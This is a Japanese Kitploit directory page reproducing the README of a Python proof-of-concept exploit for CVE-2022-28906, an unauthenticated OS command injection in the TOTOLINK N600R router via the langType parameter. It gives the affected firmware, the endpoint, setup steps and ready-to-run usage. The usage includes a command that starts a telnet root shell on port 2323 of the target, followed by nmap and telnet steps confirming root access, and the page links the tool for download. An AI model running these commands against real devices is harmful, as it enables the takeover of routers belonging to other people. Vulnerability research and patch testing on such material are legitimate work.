Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-28906-POC — Python製の概念実証コード。TOTOLINK N600Rにおける未認証のOSコマンドインジェクションを実証し、langTypeパラメータを悪用してデバイス上で任意のコマンドを実行します。 | Kitploit
ツール/GitHubGitHub/finnvle/cve-2022-28906-poc
IoTセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロールハードウェアとIoTセキュリティ
GitHubfinnvle/cve-2022-28906-poc

CVE-2022-28906-POC

Python製の概念実証コード。TOTOLINK N600Rにおける未認証のOSコマンドインジェクションを実証し、langTypeパラメータを悪用してデバイス上で任意のコマンドを実行します。

リポジトリを見る
12日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-28906 PoC

TOTOLINK N600R における未認証コマンドインジェクションの Python 概念実証。

Python CVSS

脆弱性

製品TOTOLINK N600R
ファームウェアV5.3c.7159_B20190425
種別OS コマンドインジェクション (CWE-78)
パラメータlangType
エンドポイント/cgi-bin/cstecgi.cgi
CVSS v3.19.8 Critical

TOTOLink N600R V5.3c.7159_B20190425 は、/setting/setLanguageCfg の langtype パラメータを介したコマンドインジェクションの脆弱性を含むことが判明しました。

セットアップ

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

使用方法

root@kitploit:~
# 使用方法: python3 poc.py <TARGET> <COMMAND>
# 例: python3 poc.py 192.168.68.1 "reboot"
# 例: python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

python3 poc.py <TARGET> <COMMAND>

概念実証の例

PoC を使用してターゲットをリモート実行し、ポート 2323 で /bin/sh を提供するようにします。

root@kitploit:~
python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

Successful PoC response

ポート 2323 が有効になったかどうかの結果を確認します。

Nmap showing port 2323 open

telnet を使用してポート 2323 経由でターゲットに接続します。

root@kitploit:~
telnet 192.168.68.1 2323

Root shell validation

参考情報

  • NVD — CVE-2022-28906
  • CVE Record — CVE-2022-28906
  • CWE-78 — OS Command Injection

免責事項

無保証で現状のまま提供されます。著者は誤用または損害について責任を負いません。

ツールをダウンロード